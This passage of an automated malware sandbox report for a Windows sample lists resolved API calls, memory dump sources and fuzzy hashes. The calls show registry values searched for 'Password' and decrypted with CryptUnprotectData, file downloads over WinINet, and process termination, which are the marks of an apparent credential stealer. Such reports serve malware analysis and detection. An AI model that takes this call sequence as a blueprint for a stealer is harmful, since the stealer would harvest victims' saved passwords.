                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                              • String ID:
                              • API String ID: 1264946473-0
                              • Opcode ID: 433e9a4bf85689ea499530dbd9bc9d0136ce5d86df687ba0ccf0b09cf5ce9ff0
                              • Instruction ID: 87af2654e19513004238557e6de02c5a5e650228402e0954dbb78c8a01a3eddc
                              • Opcode Fuzzy Hash: 433e9a4bf85689ea499530dbd9bc9d0136ce5d86df687ba0ccf0b09cf5ce9ff0
                              • Instruction Fuzzy Hash: 03513A75A10609AFDB11EFA4DC89EEEB7B9EF58300F104419FA05E7250DB34AE05DBA0
                              APIs
                              • lstrcat.KERNEL32(?,00F2F670), ref: 003AE00D
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003AE037
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AE06F
                              • lstrcat.KERNEL32(?,00000000), ref: 003AE07D
                              • lstrcat.KERNEL32(?,?), ref: 003AE098
                              • lstrcat.KERNEL32(?,?), ref: 003AE0AC
                              • lstrcat.KERNEL32(?,00F1A748), ref: 003AE0C0
                              • lstrcat.KERNEL32(?,?), ref: 003AE0D4
                              • lstrcat.KERNEL32(?,00F2E118), ref: 003AE0E7
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AE11F
                              • GetFileAttributesA.KERNEL32(00000000), ref: 003AE126
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                              • String ID:
                              • API String ID: 4230089145-0
                              • Opcode ID: 1f09fa19649bf261f3981e7b4f4494db58eed64805e8e90fb7437d35e4a9732a
                              • Instruction ID: 5fc75f30da0b2f9bc502be2674a2256875f3bb9c999f32d62e70cd4e951f9bdc
                              • Opcode Fuzzy Hash: 1f09fa19649bf261f3981e7b4f4494db58eed64805e8e90fb7437d35e4a9732a
                              • Instruction Fuzzy Hash: 8D618E7191151CAFCB56DB64CC48ADEB7B8FF58300F1049A5A60AA7250DF70AF899F90
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 00396AFF
                              • InternetOpenA.WININET(003BCFEC,00000001,00000000,00000000,00000000), ref: 00396B2C
                              • StrCmpCA.SHLWAPI(?,00F2F930), ref: 00396B4A
                              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00396B6A
                              • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00396B88
                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00396BA1
                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00396BC6
                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00396BF0
                              • CloseHandle.KERNEL32(00000000), ref: 00396C10
                              • InternetCloseHandle.WININET(00000000), ref: 00396C17
                              • InternetCloseHandle.WININET(?), ref: 00396C21
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                              • String ID:
                              • API String ID: 2500263513-0
                              • Opcode ID: 78fc8693c8d8047dd9292f1cd669b5fc4f44298fdfeaef704592429b9ab75837
                              • Instruction ID: fbfebca6a7e022a2d15a14d88e0a100cdfe6c937fd8e512e0cf152da6542e642
                              • Opcode Fuzzy Hash: 78fc8693c8d8047dd9292f1cd669b5fc4f44298fdfeaef704592429b9ab75837
                              • Instruction Fuzzy Hash: 37419271A01605AFDF21DF65DC4AFAE77B8EB54701F004458FA05EB280EF70AD449BA4
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,003A4F39), ref: 003B4545
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003B454C
                              • wsprintfW.USER32 ref: 003B455B
                              • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 003B45CA
                              • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 003B45D9
                              • CloseHandle.KERNEL32(00000000,?,?), ref: 003B45E0
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                              • String ID: 9O:$%hs$9O:
                              • API String ID: 885711575-419449927
                              • Opcode ID: f57a9c471fe825cd0781ec045f47e76b5fbc46767caf49317351ef90675cae04
                              • Instruction ID: 9fd1f31ca9e313a80409a7cddbf2fe3886522889ad2b258ca7b3d7b2da920622
                              • Opcode Fuzzy Hash: f57a9c471fe825cd0781ec045f47e76b5fbc46767caf49317351ef90675cae04
                              • Instruction Fuzzy Hash: 05317072A00A09BFDB21DBA4DC49FEE7778FF55704F104059F605E7180DB70AA458BA9
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039BC1F
                              • lstrlen.KERNEL32(00000000), ref: 0039BC52
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039BC7C
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039BC84
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039BCAC
                              • lstrlen.KERNEL32(003C4AD4), ref: 0039BD23
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat
                              • String ID:
                              • API String ID: 2500673778-0
                              • Opcode ID: 1275a340217cac04d5bde0b5c71894fb8d51b5ff6ca89bfb3b1a4630084792e4
                              • Instruction ID: 1932afd748f7e9713152dc5d5809b743c7b7d21e9ed7de9fafa65592a3b8ef6a
                              • Opcode Fuzzy Hash: 1275a340217cac04d5bde0b5c71894fb8d51b5ff6ca89bfb3b1a4630084792e4
                              • Instruction Fuzzy Hash: 92A17F31A01605DFCF26EF69EA49EAEB7B4BF54304F1A8069E406DB261DB31DC45CB90
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 003B5F2A
                              • std::_Xinvalid_argument.LIBCPMT ref: 003B5F49
                              • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 003B6014
                              • memmove.MSVCRT(00000000,00000000,?), ref: 003B609F
                              • std::_Xinvalid_argument.LIBCPMT ref: 003B60D0
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_$memmove
                              • String ID: invalid string position$string too long
                              • API String ID: 1975243496-4289949731
                              • Opcode ID: c789b21c9d30722817a87c8a91c148d57992324cc2cd9135fdbdb54e28bcf499
                              • Instruction ID: 9167fea908933a59310a692e595758374343b535f394e648a2ab166d2092c174
                              • Opcode Fuzzy Hash: c789b21c9d30722817a87c8a91c148d57992324cc2cd9135fdbdb54e28bcf499
                              • Instruction Fuzzy Hash: 7F61A370714504DBDB1ADF5DC8D1AAEF3B6EF84308B244919E692CBB82D731ED808B55
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AE06F
                              • lstrcat.KERNEL32(?,00000000), ref: 003AE07D
                              • lstrcat.KERNEL32(?,?), ref: 003AE098
                              • lstrcat.KERNEL32(?,?), ref: 003AE0AC
                              • lstrcat.KERNEL32(?,00F1A748), ref: 003AE0C0
                              • lstrcat.KERNEL32(?,?), ref: 003AE0D4
                              • lstrcat.KERNEL32(?,00F2E118), ref: 003AE0E7
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AE11F
                              • GetFileAttributesA.KERNEL32(00000000), ref: 003AE126
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$AttributesFile
                              • String ID:
                              • API String ID: 3428472996-0
                              • Opcode ID: d6e3be09b042d7baeea0edceb2faf26145ad815c3586776b3d01e25f86f10bc1
                              • Instruction ID: 5f2482f59ba2a162656e24895b4c6fc66f75c7f89094722d92070141b1185fe1
                              • Opcode Fuzzy Hash: d6e3be09b042d7baeea0edceb2faf26145ad815c3586776b3d01e25f86f10bc1
                              • Instruction Fuzzy Hash: C6416B72911528AFCF26EB64DC49ADE73B4BF58300F0149A4B90AA7251DF309F899F90
                              APIs
                                • Part of subcall function 003977D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00397805
                                • Part of subcall function 003977D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0039784A
                                • Part of subcall function 003977D0: StrStrA.SHLWAPI(?,Password), ref: 003978B8
                                • Part of subcall function 003977D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 003978EC
                                • Part of subcall function 003977D0: HeapFree.KERNEL32(00000000), ref: 003978F3
                              • lstrcat.KERNEL32(00000000,003C4AD4), ref: 00397A90
                              • lstrcat.KERNEL32(00000000,?), ref: 00397ABD
                              • lstrcat.KERNEL32(00000000, : ), ref: 00397ACF
                              • lstrcat.KERNEL32(00000000,?), ref: 00397AF0
                              • wsprintfA.USER32 ref: 00397B10
                              • lstrcpy.KERNEL32(00000000,?), ref: 00397B39
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00397B47
                              • lstrcat.KERNEL32(00000000,003C4AD4), ref: 00397B60
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                              • String ID: :
                              • API String ID: 398153587-3653984579
                              • Opcode ID: b4299a96f933bd65b2f0305ca4b74d6e48781b09c6b1a5f2840d1d4ecec8d789
                              • Instruction ID: b06bf037cbf78dce8d0762df2f6c2abd45a86b5dd42f741faa44340ebcb7b67a
                              • Opcode Fuzzy Hash: b4299a96f933bd65b2f0305ca4b74d6e48781b09c6b1a5f2840d1d4ecec8d789
                              • Instruction Fuzzy Hash: 8531C376A24618EFCF12DBA8DC48EAFB779FB94300B150519E506A3340DB70ED49DBA0
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 003A820C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A8243
                              • lstrlen.KERNEL32(00000000), ref: 003A8260
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A8297
                              • lstrlen.KERNEL32(00000000), ref: 003A82B4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A82EB
                              • lstrlen.KERNEL32(00000000), ref: 003A8308
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A8337
                              • lstrlen.KERNEL32(00000000), ref: 003A8351
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A8380
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: ec915264f9e5849a3bdfd9e527eef00c3f01cd2eb92ae3a0600bf071098d17c0
                              • Instruction ID: 91c26da4a396df38f032c284da7dff09f1b778d359899744ab9a92507ab4cddc
                              • Opcode Fuzzy Hash: ec915264f9e5849a3bdfd9e527eef00c3f01cd2eb92ae3a0600bf071098d17c0
                              • Instruction Fuzzy Hash: F2518079901A029FDF16DF69D868A6BB7A8EF05700F064514ED06DB284DF30ED61CBD0
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00397805
                              • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0039784A
                              • StrStrA.SHLWAPI(?,Password), ref: 003978B8
                                • Part of subcall function 00397750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0039775E
                                • Part of subcall function 00397750: RtlAllocateHeap.NTDLL(00000000), ref: 00397765
                                • Part of subcall function 00397750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0039778D
                                • Part of subcall function 00397750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 003977AD
                                • Part of subcall function 00397750: LocalFree.KERNEL32(?), ref: 003977B7
                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003978EC
                              • HeapFree.KERNEL32(00000000), ref: 003978F3
                              • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00397A35
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                              • String ID: Password
                              • API String ID: 356768136-3434357891
                              • Opcode ID: 6d8d9dfdec449ea2dd57c40fd28202585d65ab9b29cc835c4823733d36b3da07
                              • Instruction ID: 1304510fc6da6fca7af197502d1d0119c3053fe748d79a6a36114c40bdb5ed1c
                              • Opcode Fuzzy Hash: 6d8d9dfdec449ea2dd57c40fd28202585d65ab9b29cc835c4823733d36b3da07
                              • Instruction Fuzzy Hash: 33713FB1D0021DAFDF10DF95CC81AEEBBB8EF45300F1445A9E509E7240EB315A89CB91
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00391135
